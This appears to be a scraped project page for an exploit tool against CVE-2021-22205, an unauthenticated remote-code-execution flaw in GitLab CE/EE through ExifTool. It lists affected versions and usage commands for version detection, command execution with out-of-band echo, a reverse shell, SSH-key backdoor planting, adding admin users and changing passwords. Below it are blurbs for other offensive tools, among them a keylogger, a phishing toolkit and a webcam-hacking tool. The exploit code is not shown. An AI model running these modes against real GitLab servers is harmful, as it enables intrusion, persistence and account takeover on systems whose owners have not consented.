GitLab CE/EE Preauth RCE using ExifTool

Related tags

Security related resourcesgitlabpentest-scriptscve-2021-22205preauth-rce
Overview

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

Features

  • Gitlab version detection through the hash in Webpack manifest.json

  • Automatical out-of-band interactions with DNSLog & PostBin

  • Support Reverse Bash Shell / Append SSH Key to authorized_keys

  • Support ENTER to modify and restore gitlab user password

Usage

๐Ÿš โ€บโ€บโ€บ python CVE-2021-22205.py

      โ–‘โ–‘โ–‘โ–‘โ–โ–โ–‘โ–‘โ–‘  CVE-2021-22205
 โ–  โ–‘โ–‘โ–‘โ–‘โ–‘โ–„โ–ˆโ–ˆโ–„โ–„  GitLab CE/EE Unauthenticated RCE using ExifTool
  โ–€โ–€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–€โ–‘โ–‘  Affecting all versions starting from 11.9
  โ–‘โ–‘โ–โ–โ–‘โ–‘โ–โ–โ–‘โ–‘  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 โ–’โ–’โ–’โ–โ–โ–’โ–’โ–โ–โ–’  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # ็‰ˆๆœฌ & ๆผๆดžๆŽขๆต‹
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # ๅ‘ฝไปคๆ‰ง่กŒ OOB ๅ›žๆ˜พ
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # ๅ‘ฝไปคๆ‰ง่กŒๅ†™ๆ–‡ไปถๅ›žๆ˜พ
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # ๅๅผน SHELL
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # SSH ๅŽ้—จๆคๅ…ฅ
    python3 CVE-2021-22205.py -u site_url -m add user pass # ๆทปๅŠ ็ฎก็†็”จๆˆท
    python3 CVE-2021-22205.py -u site_url -m mod user      # ไฟฎๆ”น user ๅฏ†็  => [email protected]
    python3 CVE-2021-22205.py -u site_url -m rec user      # ่ฟ˜ๅŽŸ user ๅฏ†็ 

Screenshot

Detect:

image-20211111130659726

RCE(Echo via PostBin OOB):

image-20211111132623307

Reverse Bash Shell:

image-20211111131442470

Append SSH Key to authorized_keys:

image-20211111133555010

Gitlab user password modification and restoration:

image-20211111132115090

Reference

Owner
3ND
3ND
GitHub Repository
Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

sqlmapproject 25.7k Jan 08, 2023
Keystroke logging, often referred to as keylogging or keyboard capturing

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording the keys struck on a keyboard, typically covertly, so that a person using the keyboard is unaware

Harsha G 2 Jan 11, 2022
vulnerable APIs

vulnerable-apis vulnerable APIs inspired by https://github.com/mattvaldes/vulnerable-api Setup Docker If, Out of the box docker pull kmmanoj/vulnerabl

9 Jun 01, 2022
Python library to prevent XSS(cross site scripting attach) by removing harmful content from data.

A tool for removing malicious content from input data before saving data into database. It takes input containing HTML with XSS scripts and returns va

2 Jul 05, 2022
NS-LOOKUP - A python script for scanning website for getting ip address of a website

NS-LOOKUP A python script for scanning website for getting ip address of a websi

Spider Anongreyhat 5 Aug 02, 2022
Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT. This repository includes tools and documentation for the Cryptick device.

1 Dec 31, 2021
A python module for retrieving and parsing WHOIS data

pythonwhois A WHOIS retrieval and parsing library for Python. Dependencies None! All you need is the Python standard library. Instructions The manual

Sven Slootweg 384 Dec 23, 2022
This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device

f5-waf-enforce-sigs-CVE-2021-44228 This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device Overview This script enforce

Ismael Gonรงalves 5 Mar 31, 2022
Hadoop Yan ResourceManager unauthorized RCE

Vuln Impact There was an unauthorized access vulnerability in Hadoop yarn ResourceManager. This vulnerability existed in Hadoop yarn, the core compone

Al1ex 25 Nov 24, 2022
Phishing Campaign Toolkit

King Phisher Phishing Campaign Toolkit Installation For instructions on how to install, please see the INSTALL.md file. After installing, for instruct

RSM US LLP 1.9k Jan 01, 2023
the swiss army knife in the hash field. fast, reliable and easy to use

hexxus Hexxus is a fast hash cracking tool which checks more than 30 thousand passwords in under 4 seconds and can crack the following types bcrypt sh

enigma146 17 Apr 05, 2022
The First Python Compatible Camera Hacking Tool

ZCam Hack webcam using python by sending malicious link. FEATURES : [+] Real-time Camera hacking [+] Python compatible [+] URL Shortener using bitly [

Sanketh J 109 Dec 28, 2022
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit

CVE-2021-40444 builders This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit. This repo is just for testing, re

ASL IT Security 168 Nov 09, 2022
LaxrFar Python Obfuscator

LaxrFar Python Obfuscator Usage First do the things from "Upload to Webserver" o

LaxrFar 5 Jul 19, 2022
JS Deobfuscation is a Python script that deobfuscate JS code and it's time saver for you.

JS Deobfuscation is a Python script that deobfuscate JS code and it's time saver for you. Although it may not work with high degrees of obfuscation, it's a pretty nice tool to help you even if it's j

Quatrecentquatre 3 May 01, 2022
PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)

PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager) This script allows to check and exploit missing authentication checks in

chipik 82 Nov 09, 2022
A simple Burp Suite extension to extract datas from source code

DataExtractor A simple Burp Suite extension to extract datas from source code. Features in scope parsing file extensions to ignore files exclusion bas

Gwendal Le Coguic 86 Dec 31, 2022
MongoDB-Injection - This challenge-script is custom-made for web-server running MongoDB which is vulnerable to No-SQL injection

MongoDB-Injection Cheesy Multi-threaded script for NoSQL Injection This challeng

Caretaker 2 Jun 06, 2022
๐Ÿ’ฃ Bomb Crypto Bot ๐Ÿ’ฃ

๐Ÿ’ฃ Bomb Crypto Bot ๐Ÿ’ฃ โš ๏ธ Warning I am not responsible for any penalties incurred by those who use the bot, use it at your own risk. ๐Ÿ“„ Documentation -

Matheus Benites 4 Apr 27, 2022
A python tool capable of creating HUGE wordlists. Has the ability to add custom words for concatenation in any way you see fit.

A python tool capable of creating HUGE wordlists. Has the ability to add custom words for concatenation in any way you see fit.

Codex 9 Oct 05, 2022